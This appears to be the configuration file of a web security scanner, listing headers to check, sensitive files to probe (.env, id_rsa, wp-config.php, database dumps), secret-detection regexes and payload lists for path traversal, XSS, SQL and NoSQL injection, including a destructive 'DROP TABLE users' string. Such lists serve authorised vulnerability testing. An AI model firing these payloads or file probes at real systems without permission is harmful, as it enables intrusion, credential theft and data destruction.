# scanner/config.py

# Security Headers for HeaderScanner
SECURITY_HEADERS = [
    "Content-Security-Policy",
    "Content-Security-Policy-Report-Only",
    "Strict-Transport-Security",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "X-XSS-Protection",
    "Referrer-Policy",
    "Permissions-Policy",
    "Expect-CT",
    "X-Permitted-Cross-Domain-Policies",
    "Cross-Origin-Embedder-Policy",
    "Cross-Origin-Opener-Policy",
    "Cross-Origin-Resource-Policy",
]

# Sensitive Files for HeaderScanner
SENSITIVE_FILES = [
    ".env",
    ".env.local",
    ".env.production",
    ".git/config",
    ".git/HEAD",
    ".gitignore",
    "docker-compose.yml",
    "Dockerfile",
    "phpinfo.php",
    "config.php",
    "web.config",
    ".htaccess",
    "wp-config.php",
    "wp-config.php.bak",
    "configuration.php",
    "sitemap.xml",
    "robots.txt",
    "server-status",
    "server-info",
    "backup.zip",
    "backup.tar.gz",
    "backup.sql",
    "data.sql",
    "database.sql",
    "dump.sql",
    "admin/",
    "administrator/",
    "phpmyadmin/",
    "test/",
    "debug/",
    "info.php",
    "config.bak",
    "config.old",
    "id_rsa",
    "id_rsa.pub",
    "authorized_keys",
    "root.txt",
    "user.txt",
    "credentials.txt",
    "passwords.txt",
    "lfi_test.php",
    "index.php.bak",
    "index.html.bak",
    "config/.env",
    "web/.env",
    ".DS_Store",
    "package.json",
    "composer.json",
    "yarn.lock",
    "package-lock.json",
    ".npmrc",
    ".dockerignore",
    "Makefile",
    ".bash_history",
    ".mysql_history",
    "error_log",
    "access_log",
    "error.log",
    "access.log",
]

# Regex Patterns for JSAnalyzer
JS_PATTERNS = {
    'API Endpoint': r'\/api\/v[0-9]\/[\w\/-]+',
    'Firebase Key': r'AIza[0-9A-Za-z-_]{35}',
    'AWS Access Key': r'(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])',
    'AWS Secret Key': r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])',
    'Google API Key': r'AIza[0-9A-Za-z-_]{35}',
    'Slack Token': r'xoxb-[0-9]{11}-[0-9]{11}-[0-9a-zA-Z]{24}',
    'GitHub Token': r'(ghp|gho|ghu|ghs|ghr)_[0-9a-zA-Z]{36}',
    'Stripe Secret Key': r'sk_live_[0-9a-zA-Z]{24}',
    'Stripe Public Key': r'pk_live_[0-9a-zA-Z]{24}',
    'Twilio API Key': r'SK[0-9a-fA-F]{32}',
    'JWT Token': r'ey[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+',
    'Generic Secret': r'(?i)(secret|key|token|auth|password)\s*[:=]\s*["\']([a-zA-Z0-9_\-]{16,})["\']',
    'Internal IP Address': r'\b(10|172\.(1[6-9]|2[0-9]|3[0-1])|192\.168)\.\d{1,3}\.\d{1,3}\b',
    'Private Key': r'-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----',
    'URL': r'https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)',
    'Email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
    'Phone Number': r'\+?[1-9]\d{1,14}',
}

# Interesting Keys for ParameterFuzzer (IDOR/Mass Assignment)
INTERESTING_KEYS = [
    'id', 'user_id', 'account_id', 'profile_id', 'admin_id',
    'role', 'is_admin', 'admin', 'user', 'uuid', 'idx', 'seq', 'data',
    'objectid', 'tenant_id', 'client_id', 'group_id', 'access', 'perm',
    'uid', 'gid', 'oid', 'pid', 'sid', 'token', 'session', 'auth',
]

# Fuzzing values for ParameterFuzzer
FUZZ_VALUES_INT = [0, 1, -1, 123456789, 999999999, 1000, 2147483647, -2147483648]
FUZZ_VALUES_STR = [
    "", "null", "undefined", "true", "false", "test", "admin", "user", "root",
    "1", "0", "-1", "123", "999",
    "../", "../../", "../../../etc/passwd",
    "..\\..\\..\\windows\\system32\\config\\sam",
    "<script>alert(1)</script>",
    "' OR 1=1--", "' AND 1=1--", "\" OR 1=1--",
    "{'$ne':1}", "{'$gt':''}",
    "%00", "\x00",
    "${7*7}", "{{7*7}}",
]

# XSS Payloads for XSSScanner
XSS_PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "' \"><script>alert(1)</script>",
    "<svg onload=alert(1)>",
    "javascript:alert(1)",
    "<details open ontoggle=alert(document.domain)>",
    "<body onload=alert(document.cookie)>",
    "<iframe src=\"javascript:alert(1)\"></iframe>",
    "<input autofocus onfocus=alert(1)>",
    "<video src=x onerror=alert(1)>",
    "<img src=x oneRror=alert(1)>",
    "'><script>alert(1)</script>",
    "</script><script>alert(1)</script>",
    "%3cscript%3ealert(1)%3c/script%3e",
    "<a href='javascript:alert(1)'>Click</a>",
    "&lt;script&gt;alert(1)&lt;/script&gt;",
    "<marquee onstart=alert(1)>",
    "<select onfocus=alert(1) autofocus>",
    "<textarea onfocus=alert(1) autofocus>",
    "<keygen onfocus=alert(1) autofocus>",
    "<math><mtext></mtext><mglyph><style></math><img src onerror=alert(1)>",
]

# SQL Injection Payloads
SQL_PAYLOADS = [
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1'/*",
    "\" OR \"1\"=\"1",
    "\" OR \"1\"=\"1\"--",
    "' OR 1=1--",
    "\" OR 1=1--",
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "admin'--",
    "admin' #",
    "admin'/*",
    "' or 1=1 limit 1 --",
    "'='",
    "' LIKE '%",
    "') OR ('1'='1",
    "') OR ('1'='1'--",
    "1' ORDER BY 1--",
    "1' ORDER BY 2--",
    "1' ORDER BY 3--",
    "1' GROUP BY 1--",
    "1' GROUP BY 2--",
    "' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
    "' WAITFOR DELAY '0:0:5'--",
    "1; SELECT SLEEP(5)--",
    "'; DROP TABLE users--",
]

# Common SQL Error Messages
SQL_ERRORS = [
    "SQL syntax",
    "mysql_fetch",
    "mysql_num_rows",
    "ORA-01756",
    "SQLServer JDBC Driver",
    "PostgreSQL query failed",
    "pg_query()",
    "pg_exec()",
    "supplied argument is not",
    "Microsoft OLE DB Provider for SQL Server",
    "Unclosed quotation mark",
    "ODBC SQL Server Driver",
    "Microsoft Access Driver",
    "SQLite/JDBCDriver",
    "System.Data.SQLite.SQLiteException",
]
